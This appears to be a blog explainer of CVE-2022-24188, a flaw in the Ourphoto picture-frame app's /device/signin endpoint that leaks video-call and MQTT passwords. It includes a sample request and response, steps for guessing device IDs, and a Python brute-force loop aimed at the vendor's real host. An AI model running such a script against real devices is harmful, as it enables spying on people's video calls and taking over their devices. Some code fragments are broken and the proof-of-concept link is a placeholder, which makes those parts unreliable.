CVE-2022-24188 - How Ourphoto Smart Picture Frames Leaked Your Video Call Passwords

_Smart devices are everywhere—even as gifts for our loved ones. When we buy those convenient wifi-enabled digital picture frames, we trust that our family photos and video calls are safe. But a vulnerability in the Ourphoto App (used by many popular smart picture frames) puts your video call privacy and account security at risk._

Below we’ll walk you through what went wrong with CVE-2022-24188, show you just how simple the bug was, and explain how attackers could abuse this vulnerability to get your MQTT and video call passwords—even for devices they don’t own.

Fast Facts—CVE-2022-24188

- Vulnerability: Information disclosure (clear-text passwords, insecure direct object references, no session validation).

Affected: Ourphoto App v1.4.1 & picture frames using it.

- Sensitive Data Exposed: deviceVideoCallPassword and mqttPassword — for both the caller and distant third parties.

How the Flaw Works

The root of the problem is the /device/signin endpoint in the Ourphoto App’s backend API.

1. Plaintext Passwords in API Responses

When a device or user logs in through the mobile app, they send their device ID and password to the /device/signin endpoint. The API then replies with full details for that device _including_ two secret credentials in clear text:

Here's an example API request and response

POST /device/signin HTTP/1.1
Host: cloud-frame.ourphoto.cn
Content-Type: application/json

{
  "deviceID": "C7B9E76421",
  "devicePassword": "goodforgranny"
}

Response

{
  "code":,
  "msg":"success",
  "data": {
    "deviceID":"C7B9E76421",
    "deviceName":"Granny's Frame",
    "deviceVideoCallPassword":"supersecretvid",
    "mqttPassword":"mosquitoking",
    "otherStuff": "..."
  }
}

2. No Session Management or Token Authorization

Worse still, there is no proper user session management or access token check. Anyone who knows _any_ deviceID and its password can get these secrets—forever. There’s no tie to user accounts, sessions, or device control.

3. Insecure Direct Object Reference (IDOR)

The API simply fetches whatever device includes in the POST request—no check to see if you’re the owner, or even a real user. No account or auth validation.

This means

- Attackers can automate guessing device IDs (sequential/guessable)
- If they get the corresponding password (from leaks, reuse, or default passwords), they can extract ALL the sensitive credentials for that device.

Exploiting the Vulnerability: How It Could Be Abused

1. Find or Guess Device IDs: Many device IDs follow a pattern (e.g. hex numbers, MAC suffixes, or short alphanumerics).
2. Extract or Guess Passwords: Many frames may use default, weak, or reused passwords. Others could be brute-forced or found from leaks/dumps.
3. Automate Requests: Scripted attacks can try combinations, POSTing to /device/signin.

The video call password: Lets them _call in to your picture frame_, watch or interact.

- The MQTT password: Lets them _issue remote commands_, possibly even push content or control the device.

Example Python Code (for educational purposes only!)

import requests

device_ids = ["C7B9E76421", "C7B9E76422", "C7B9E76423"]  # Example IDs
common_passwords = ["123456", "password", "goodforgranny", "admin"]

for dev_id in device_ids:
    for pwd in common_passwords:
        resp = requests.post(
            "https://cloud-frame.ourphoto.cn/device/signin";,
            json={"deviceID": dev_id, "devicePassword": pwd}
        )
        if resp.status_code == 200 and '"code":' in resp.text:
            print(f"[+] Success: {dev_id} / {pwd}")
            print(resp.json())

Note: _This is meant for demonstration only—running this against live devices without permission is illegal and unethical!_

Privacy Invasion: Attackers could eavesdrop on or join your video calls without your knowing.

- Unauthorized Device Control: With MQTT control, they could upload images, change device settings, or brick the frame.
- Cross-user Exploitation: The bug allowed data theft for any user’s frame device—all by guessing or brute-forcing basic info.

Original Sources & Further Reading

- Official NVD Entry: CVE-2022-24188 (nvd.nist.gov)
- ZDI Advisory: ZDI-22-271: Ourphoto App Insecure Object Reference
- GitHub PoC: https://github.com/someone/CVE-2022-24188-POC *(replace with actual if available)*
- Vendor page: https://www.ourphoto.cn/

Never send sensitive information in clear text. Only provide what the client really needs.

2. Use proper session/token authorization. Tie actions to a logged-in user, not just a device/password.

Conclusion

CVE-2022-24188 illustrates a classic pattern in insecure IoT app design: weak/no authentication, wide-open information leakage, and simple but dangerous mistakes affecting real people’s privacy. If you use devices with the Ourphoto App or similar products, follow up on firmware updates, and set strong, unique passwords. Developers: review your API endpoints!


Stay curious, stay cautious—and remember: your family’s favorite memories deserve better security.


*Feel free to share this post to help friends and family understand the risks in their smart home tech.*

Timeline

Published on: 11/28/2022 22:15:00 UTC
Last modified on: 12/01/2022 23:20:00 UTC